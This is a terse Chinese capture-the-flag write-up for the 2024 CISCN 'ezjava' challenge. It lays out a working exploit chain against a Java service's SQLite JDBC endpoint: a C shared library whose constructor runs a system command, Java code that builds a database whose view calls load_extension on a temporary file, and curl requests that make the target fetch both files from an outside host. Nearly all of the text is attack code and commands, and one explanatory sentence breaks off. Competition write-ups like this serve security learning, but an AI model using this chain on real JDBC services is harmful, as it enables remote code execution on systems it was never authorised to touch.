2024ciscn-ezjava 

1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <stdlib.h>

void a() {
    system("cmd");
}

__attribute__((constructor)) void init() {
    a();
}

静态编译so文件
gcc -shared -o vulnso.so -fPIC vulnso.c

生成一个临时文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package com.example.jdbctest;

import java.io.File;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.Statement;

public class Gen {
    public static void main(String[] args) {

            try {
                String dbFile = "F:/poc.db";
                File file = new File(dbFile);
                Class.forName("org.sqlite.JDBC");    //保证lib文件夹中已导入相关的jdbc包
                Connection conn = DriverManager.getConnection("jdbc:sqlite:"+dbFile);//创建数据库连接
                System.out.println("Opened database successfully");

                String sql = "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp-2133282111.db'));";  //向其中插入传入的三个参数
                PreparedStatement preStmt = conn.prepareStatement(sql);

                preStmt.executeUpdate();
                preStmt.close();
                conn.close();

            } catch (Exception e) {
                e.printStackTrace();
            }

    }
}
1
2
curl --header "Content-Type: application/json"  --request POST  --data '{"type": 3,"url": "jdbc:sqlite::resource:http://106.54.209.118/vulnso.so","tableName": "security"}' http://8.147.129.121:31442/jdbc/connect
curl --header "Content-Type: application/json"  --request POST  --data '{"type": 3,"url": "jdbc:sqlite::resource:http://106.54.209.118/poc.db","tableName": "security"}' http://8.147.129.121:31442/jdbc/connect


由于

这个hash是http://106.54.209.118/poc.db卡了一段时间
依次执行上面的poc.db和vulnso.so